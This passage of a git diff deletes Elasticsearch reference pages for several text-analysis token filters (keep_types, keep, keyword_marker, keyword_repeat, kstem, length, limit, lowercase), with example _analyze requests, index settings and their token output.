- -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "keep_types", - "types": [ "" ] - } - ], - "text": "1 quick fox 2 lazy dogs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ 1, 2 ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "1", - "start_offset": 0, - "end_offset": 1, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 12, - "end_offset": 13, - "type": "", - "position": 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-keep-types-tokenfilter-analyze-exclude-ex]] -==== Exclude example - -The following <> request uses the `keep_types` -filter to remove `` tokens from `1 quick fox 2 lazy dogs`. Note the `mode` -parameter is set to `exclude`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "keep_types", - "types": [ "" ], - "mode": "exclude" - } - ], - "text": "1 quick fox 2 lazy dogs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ quick, fox, lazy, dogs ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 2, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "fox", - "start_offset": 8, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "lazy", - "start_offset": 14, - "end_offset": 18, - "type": "", - "position": 4 - }, - { - "token": "dogs", - "start_offset": 19, - "end_offset": 23, - "type": "", - "position": 5 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-keep-types-tokenfilter-configure-parms]] -==== Configurable parameters - -`types`:: -(Required, array of strings) -List of token types to keep or remove. - -`mode`:: -(Optional, string) -Indicates whether to keep or remove the specified token types. -Valid values are: - -`include`::: -(Default) Keep only the specified token types. - -`exclude`::: -Remove the specified token types. - -[[analysis-keep-types-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `keep_types` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `keep_types` filter to configure a new -<>. The custom `keep_types` filter -keeps only `` (alphanumeric) tokens. 
- -[source,console] --------------------------------------------------- -PUT keep_types_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ "extract_alpha" ] - } - }, - "filter": { - "extract_alpha": { - "type": "keep_types", - "types": [ "" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/keep-words-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keep-words-tokenfilter.asciidoc deleted file mode 100644 index a0a9c08bf99..00000000000 --- a/docs/reference/analysis/tokenfilters/keep-words-tokenfilter.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[analysis-keep-words-tokenfilter]] -=== Keep words token filter -++++ -Keep words -++++ - -Keeps only tokens contained in a specified word list. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/KeepWordFilter.html[KeepWordFilter]. - -[NOTE] -==== -To remove a list of words from a token stream, use the -<> filter. -==== - -[[analysis-keep-words-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `keep` filter to -keep only the `fox` and `dog` tokens from -`the quick fox jumps over the lazy dog`. - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "keep", - "keep_words": [ "dog", "elephant", "fox" ] - } - ], - "text": "the quick fox jumps over the lazy dog" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ fox, dog ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 10, - "end_offset": 13, - "type": "word", - "position": 2 - }, - { - "token": "dog", - "start_offset": 34, - "end_offset": 37, - "type": "word", - "position": 7 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-keep-words-tokenfilter-configure-parms]] -==== Configurable parameters - -`keep_words`:: -+ --- -(Required+++*+++, array of strings) -List of words to keep. Only tokens that match words in this list are included in -the output. - -Either this parameter or `keep_words_path` must be specified. --- - -`keep_words_path`:: -+ --- -(Required+++*+++, array of strings) -Path to a file that contains a list of words to keep. Only tokens that match -words in this list are included in the output. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each word in the file must be separated by a line break. - -Either this parameter or `keep_words` must be specified. --- - -`keep_words_case`:: -(Optional, Boolean) -If `true`, lowercase all keep words. Defaults to `false`. - -[[analysis-keep-words-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `keep` filter, duplicate it to create the basis for a new -custom token filter. You can modify the filter using its configurable -parameters. 
- -For example, the following <> request -uses custom `keep` filters to configure two new -<>: - -* `standard_keep_word_array`, which uses a custom `keep` filter with an inline - array of keep words -* `standard_keep_word_file`, which uses a custom `keep` filter with a keep - words file - -[source,console] --------------------------------------------------- -PUT keep_words_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_keep_word_array": { - "tokenizer": "standard", - "filter": [ "keep_word_array" ] - }, - "standard_keep_word_file": { - "tokenizer": "standard", - "filter": [ "keep_word_file" ] - } - }, - "filter": { - "keep_word_array": { - "type": "keep", - "keep_words": [ "one", "two", "three" ] - }, - "keep_word_file": { - "type": "keep", - "keep_words_path": "analysis/example_word_list.txt" - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/keyword-marker-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keyword-marker-tokenfilter.asciidoc deleted file mode 100644 index aab546326a9..00000000000 --- a/docs/reference/analysis/tokenfilters/keyword-marker-tokenfilter.asciidoc +++ /dev/null @@ -1,389 +0,0 @@ -[[analysis-keyword-marker-tokenfilter]] -=== Keyword marker token filter -++++ -Keyword marker -++++ - -Marks specified tokens as keywords, which are not stemmed. - -The `keyword_marker` filter assigns specified tokens a `keyword` attribute of -`true`. Stemmer token filters, such as -<> or -<>, skip tokens with a `keyword` -attribute of `true`. - -[IMPORTANT] -==== -To work properly, the `keyword_marker` filter must be listed before any stemmer -token filters in the <>. -==== - -The `keyword_marker` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/KeywordMarkerFilter.html[KeywordMarkerFilter]. - -[[analysis-keyword-marker-tokenfilter-analyze-ex]] -==== Example - -To see how the `keyword_marker` filter works, you first need to produce a token -stream containing stemmed tokens. - -The following <> request uses the -<> filter to create stemmed tokens for -`fox running and jumping`. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ "stemmer" ], - "text": "fox running and jumping" -} ----- - -The request produces the following tokens. Note that `running` was stemmed to -`run` and `jumping` was stemmed to `jump`. - -[source,text] ----- -[ fox, run, and, jump ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "jump", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To prevent `jumping` from being stemmed, add the `keyword_marker` filter before -the `stemmer` filter in the previous analyze API request. Specify `jumping` in -the `keywords` parameter of the `keyword_marker` filter. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "keyword_marker", - "keywords": [ "jumping" ] - }, - "stemmer" - ], - "text": "fox running and jumping" -} ----- - -The request produces the following tokens. `running` is still stemmed to `run`, -but `jumping` is not stemmed.
- -[source,text] ----- -[ fox, run, and, jumping ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3 - } - ] -} ----- -//// - -To see the `keyword` attribute for these tokens, add the following arguments to -the analyze API request: - -* `explain`: `true` -* `attributes`: `keyword` - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "keyword_marker", - "keywords": [ "jumping" ] - }, - "stemmer" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note the `jumping` token has a -`keyword` attribute of `true`. - -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": { - "name": "whitespace", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3 - } - ] - }, - "tokenfilters": [ - { - "name": "__anonymous__keyword_marker", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - } - ] - }, - { - "name": "stemmer", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - } - ] - } - ] - } -} ----- - -[[analysis-keyword-marker-tokenfilter-configure-parms]] -==== Configurable parameters - -`ignore_case`:: -(Optional, Boolean) -If `true`, matching for the `keywords` and `keywords_path` parameters ignores -letter case. Defaults to `false`. - -`keywords`:: -(Required*, array of strings) -Array of keywords. Tokens that match these keywords are not stemmed. -+ -This parameter, `keywords_path`, or `keywords_pattern` must be specified. -You cannot specify this parameter and `keywords_pattern`. - -`keywords_path`:: -+ --- -(Required*, string) -Path to a file that contains a list of keywords. Tokens that match these -keywords are not stemmed. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. 
Each word in the file must be separated by a line break. - -This parameter, `keywords`, or `keywords_pattern` must be specified. -You cannot specify this parameter and `keywords_pattern`. --- - -`keywords_pattern`:: -+ --- -(Required*, string) -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java -regular expression] used to match tokens. Tokens that match this expression are -marked as keywords and not stemmed. - -This parameter, `keywords`, or `keywords_path` must be specified. You -cannot specify this parameter and `keywords` or `keywords_pattern`. - -[WARNING] -==== -Poorly written regular expressions can cause {es} to run slowly or result -in stack overflow errors, causing the running node to suddenly exit. -==== --- - -[[analysis-keyword-marker-tokenfilter-customize]] -==== Customize and add to an analyzer - -To customize the `keyword_marker` filter, duplicate it to create the basis for a -new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following <> request -uses a custom `keyword_marker` filter and the `porter_stem` -filter to configure a new <>. - -The custom `keyword_marker` filter marks tokens specified in the -`analysis/example_word_list.txt` file as keywords. The `porter_stem` filter does -not stem these tokens. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "type": "custom", - "tokenizer": "standard", - "filter": [ - "my_custom_keyword_marker_filter", - "porter_stem" - ] - } - }, - "filter": { - "my_custom_keyword_marker_filter": { - "type": "keyword_marker", - "keywords_path": "analysis/example_word_list.txt" - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/keyword-repeat-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/keyword-repeat-tokenfilter.asciidoc deleted file mode 100644 index a68eb4aab4f..00000000000 --- a/docs/reference/analysis/tokenfilters/keyword-repeat-tokenfilter.asciidoc +++ /dev/null @@ -1,402 +0,0 @@ -[[analysis-keyword-repeat-tokenfilter]] -=== Keyword repeat token filter -++++ -Keyword repeat -++++ - -Outputs a keyword version of each token in a stream. These keyword tokens are -not stemmed. - -The `keyword_repeat` filter assigns keyword tokens a `keyword` attribute of -`true`. Stemmer token filters, such as -<> or -<>, skip tokens with a `keyword` -attribute of `true`. - -You can use the `keyword_repeat` filter with a stemmer token filter to output a -stemmed and unstemmed version of each token in a stream. - -[IMPORTANT] -==== -To work properly, the `keyword_repeat` filter must be listed before any stemmer -token filters in the <>. - -Stemming does not affect all tokens. This means streams could contain duplicate -tokens in the same position, even after stemming. - -To remove these duplicate tokens, add the -<> filter after the -stemmer filter in the analyzer configuration. -==== - -The `keyword_repeat` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/KeywordRepeatFilter.html[KeywordRepeatFilter]. - -[[analysis-keyword-repeat-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `keyword_repeat` -filter to output a keyword and non-keyword version of each token in -`fox running and jumping`. 
- -To return the `keyword` attribute for these tokens, the analyze API request also -includes the following arguments: - -* `explain`: `true` -* `attributes`: `keyword` - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note that one version of each token has -a `keyword` attribute of `true`. - -.**Response** -[%collapsible] -==== -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": ..., - "tokenfilters": [ - { - "name": "keyword_repeat", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": true - }, - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": true - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": true - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": false - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"tokenizer": \.\.\./"tokenizer": $body.detail.tokenizer/] -==== - -To stem the non-keyword tokens, add the `stemmer` filter after the -`keyword_repeat` filter in the previous analyze API request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note the following changes: - -* The non-keyword version of `running` was stemmed to `run`. -* The non-keyword version of `jumping` was stemmed to `jump`. - -.**Response** -[%collapsible] -==== -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": ..., - "tokenfilters": [ - { - "name": "keyword_repeat", - "tokens": ... 
- }, - { - "name": "stemmer", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": true - }, - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": false - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": true - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": true - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": false - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - }, - { - "token": "jump", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": false - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"tokenizer": \.\.\./"tokenizer": $body.detail.tokenizer/] -// TESTRESPONSE[s/"tokens": .../"tokens": $body.$_path/] -==== - -However, the keyword and non-keyword versions of `fox` and `and` are -identical and in the same respective positions. - -To remove these duplicate tokens, add the `remove_duplicates` filter after -`stemmer` in the analyze API request. - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "whitespace", - "filter": [ - "keyword_repeat", - "stemmer", - "remove_duplicates" - ], - "text": "fox running and jumping", - "explain": true, - "attributes": "keyword" -} ----- - -The API returns the following response. Note that the duplicate tokens for `fox` -and `and` have been removed. - -.**Response** -[%collapsible] -==== -[source,console-result] ----- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": ..., - "tokenfilters": [ - { - "name": "keyword_repeat", - "tokens": ... - }, - { - "name": "stemmer", - "tokens": ... - }, - { - "name": "remove_duplicates", - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0, - "keyword": true - }, - { - "token": "running", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": true - }, - { - "token": "run", - "start_offset": 4, - "end_offset": 11, - "type": "word", - "position": 1, - "keyword": false - }, - { - "token": "and", - "start_offset": 12, - "end_offset": 15, - "type": "word", - "position": 2, - "keyword": true - }, - { - "token": "jumping", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": true - }, - { - "token": "jump", - "start_offset": 16, - "end_offset": 23, - "type": "word", - "position": 3, - "keyword": false - } - ] - } - ] - } -} ----- -// TESTRESPONSE[s/"tokenizer": \.\.\./"tokenizer": $body.detail.tokenizer/] -// TESTRESPONSE[s/"tokens": .../"tokens": $body.$_path/] -==== - -[[analysis-keyword-repeat-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`keyword_repeat` filter to configure a new <>. - -This custom analyzer uses the `keyword_repeat` and `porter_stem` filters to -create a stemmed and unstemmed version of each token in a stream. The -`remove_duplicates` filter then removes any duplicate tokens from the stream. 
- -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_analyzer": { - "tokenizer": "standard", - "filter": [ - "keyword_repeat", - "porter_stem", - "remove_duplicates" - ] - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/kstem-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/kstem-tokenfilter.asciidoc deleted file mode 100644 index 2741a568ab3..00000000000 --- a/docs/reference/analysis/tokenfilters/kstem-tokenfilter.asciidoc +++ /dev/null @@ -1,115 +0,0 @@ -[[analysis-kstem-tokenfilter]] -=== KStem token filter -++++ -KStem -++++ - -Provides https://ciir.cs.umass.edu/pubfiles/ir-35.pdf[KStem]-based stemming for -the English language. The `kstem` filter combines -<> with a built-in -<>. - -The `kstem` filter tends to stem less aggressively than other English stemmer -filters, such as the <> filter. - -The `kstem` filter is equivalent to the -<> filter's -<> variant. - -This filter uses Lucene's -{lucene-analysis-docs}/en/KStemFilter.html[KStemFilter]. - -[[analysis-kstem-tokenfilter-analyze-ex]] -==== Example - -The following analyze API request uses the `kstem` filter to stem `the foxes -jumping quickly` to `the fox jump quick`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "standard", - "filter": [ "kstem" ], - "text": "the foxes jumping quickly" -} ----- - -The filter produces the following tokens: - -[source,text] ----- -[ the, fox, jump, quick ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 4, - "end_offset": 9, - "type": "", - "position": 1 - }, - { - "token": "jump", - "start_offset": 10, - "end_offset": 17, - "type": "", - "position": 2 - }, - { - "token": "quick", - "start_offset": 18, - "end_offset": 25, - "type": "", - "position": 3 - } - ] -} ----- -//// - -[[analysis-kstem-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`kstem` filter to configure a new <>. - -[IMPORTANT] -==== -To work properly, the `kstem` filter requires lowercase tokens. To ensure tokens -are lowercased, add the <> filter -before the `kstem` filter in the analyzer configuration. -==== - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "whitespace", - "filter": [ - "lowercase", - "kstem" - ] - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenfilters/length-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/length-tokenfilter.asciidoc deleted file mode 100644 index 4eced2d39b1..00000000000 --- a/docs/reference/analysis/tokenfilters/length-tokenfilter.asciidoc +++ /dev/null @@ -1,170 +0,0 @@ -[[analysis-length-tokenfilter]] -=== Length token filter -++++ -Length -++++ - -Removes tokens shorter or longer than specified character lengths. -For example, you can use the `length` filter to exclude tokens shorter than 2 -characters and tokens longer than 5 characters. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/LengthFilter.html[LengthFilter]. - -[TIP] -==== -The `length` filter removes entire tokens. If you'd prefer to shorten tokens to -a specific length, use the <> filter. 
-==== - -[[analysis-length-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `length` -filter to remove tokens longer than 4 characters: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "whitespace", - "filter": [ - { - "type": "length", - "min": 0, - "max": 4 - } - ], - "text": "the quick brown fox jumps over the lazy dog" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, fox, over, the, lazy, dog ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "fox", - "start_offset": 16, - "end_offset": 19, - "type": "word", - "position": 3 - }, - { - "token": "over", - "start_offset": 26, - "end_offset": 30, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 31, - "end_offset": 34, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 35, - "end_offset": 39, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 40, - "end_offset": 43, - "type": "word", - "position": 8 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-length-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`length` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT length_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_length": { - "tokenizer": "standard", - "filter": [ "length" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-length-tokenfilter-configure-parms]] -==== Configurable parameters - -`min`:: -(Optional, integer) -Minimum character length of a token. Shorter tokens are excluded from the -output. Defaults to `0`. - -`max`:: -(Optional, integer) -Maximum character length of a token. Longer tokens are excluded from the output. -Defaults to `Integer.MAX_VALUE`, which is `2^31-1` or `2147483647`. - -[[analysis-length-tokenfilter-customize]] -==== Customize - -To customize the `length` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. 
- -For example, the following request creates a custom `length` filter that removes -tokens shorter than 2 characters and tokens longer than 10 characters: - -[source,console] --------------------------------------------------- -PUT length_custom_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_length_2_to_10_char": { - "tokenizer": "whitespace", - "filter": [ "length_2_to_10_char" ] - } - }, - "filter": { - "length_2_to_10_char": { - "type": "length", - "min": 2, - "max": 10 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/limit-token-count-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/limit-token-count-tokenfilter.asciidoc deleted file mode 100644 index e06cba7871b..00000000000 --- a/docs/reference/analysis/tokenfilters/limit-token-count-tokenfilter.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[analysis-limit-token-count-tokenfilter]] -=== Limit token count token filter -++++ -Limit token count -++++ - -Limits the number of output tokens. The `limit` filter is commonly used to limit -the size of document field values based on token count. - -By default, the `limit` filter keeps only the first token in a stream. For -example, the filter can change the token stream `[ one, two, three ]` to -`[ one ]`. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/LimitTokenCountFilter.html[LimitTokenCountFilter]. - -[TIP] -==== - If you want to limit the size of field values based on -_character length_, use the <> mapping parameter. -==== - -[[analysis-limit-token-count-tokenfilter-configure-parms]] -==== Configurable parameters - -`max_token_count`:: -(Optional, integer) -Maximum number of tokens to keep. Once this limit is reached, any remaining -tokens are excluded from the output. Defaults to `1`. - -`consume_all_tokens`:: -(Optional, Boolean) -If `true`, the `limit` filter exhausts the token stream, even if the -`max_token_count` has already been reached. Defaults to `false`. - -[[analysis-limit-token-count-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `limit` -filter to keep only the first two tokens in `quick fox jumps over lazy dog`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "standard", - "filter": [ - { - "type": "limit", - "max_token_count": 2 - } - ], - "text": "quick fox jumps over lazy dog" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ quick, fox ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "quick", - "start_offset": 0, - "end_offset": 5, - "type": "", - "position": 0 - }, - { - "token": "fox", - "start_offset": 6, - "end_offset": 9, - "type": "", - "position": 1 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-limit-token-count-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`limit` filter to configure a new -<>. 
- -[source,console] --------------------------------------------------- -PUT limit_example -{ - "settings": { - "analysis": { - "analyzer": { - "standard_one_token_limit": { - "tokenizer": "standard", - "filter": [ "limit" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-limit-token-count-tokenfilter-customize]] -==== Customize - -To customize the `limit` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `limit` filter that keeps -only the first five tokens of a stream: - -[source,console] --------------------------------------------------- -PUT custom_limit_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_five_token_limit": { - "tokenizer": "whitespace", - "filter": [ "five_token_limit" ] - } - }, - "filter": { - "five_token_limit": { - "type": "limit", - "max_token_count": 5 - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/lowercase-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/lowercase-tokenfilter.asciidoc deleted file mode 100644 index 7d6db987ab9..00000000000 --- a/docs/reference/analysis/tokenfilters/lowercase-tokenfilter.asciidoc +++ /dev/null @@ -1,152 +0,0 @@ -[[analysis-lowercase-tokenfilter]] -=== Lowercase token filter -++++ -Lowercase -++++ - -Changes token text to lowercase. For example, you can use the `lowercase` filter -to change `THE Lazy DoG` to `the lazy dog`. - -In addition to a default filter, the `lowercase` token filter provides access to -Lucene's language-specific lowercase filters for Greek, Irish, and Turkish. - -[[analysis-lowercase-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the default -`lowercase` filter to change the `THE Quick FoX JUMPs` to lowercase: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["lowercase"], - "text" : "THE Quick FoX JUMPs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, quick, fox, jumps ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "", - "position" : 2 - }, - { - "token" : "jumps", - "start_offset" : 14, - "end_offset" : 19, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-lowercase-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`lowercase` filter to configure a new -<>. 
- -[source,console] --------------------------------------------------- -PUT lowercase_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_lowercase": { - "tokenizer": "whitespace", - "filter": [ "lowercase" ] - } - } - } - } -} --------------------------------------------------- - -[[analysis-lowercase-tokenfilter-configure-parms]] -==== Configurable parameters - -`language`:: -+ --- -(Optional, string) -Language-specific lowercase token filter to use. Valid values include: - -`greek`::: Uses Lucene's -{lucene-analysis-docs}/el/GreekLowerCaseFilter.html[GreekLowerCaseFilter] - -`irish`::: Uses Lucene's -{lucene-analysis-docs}/ga/IrishLowerCaseFilter.html[IrishLowerCaseFilter] - -`turkish`::: Uses Lucene's -{lucene-analysis-docs}/tr/TurkishLowerCaseFilter.html[TurkishLowerCaseFilter] - -If not specified, defaults to Lucene's -{lucene-analysis-docs}/core/LowerCaseFilter.html[LowerCaseFilter]. --- - -[[analysis-lowercase-tokenfilter-customize]] -==== Customize - -To customize the `lowercase` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `lowercase` filter for the -Greek language: - -[source,console] --------------------------------------------------- -PUT custom_lowercase_example -{ - "settings": { - 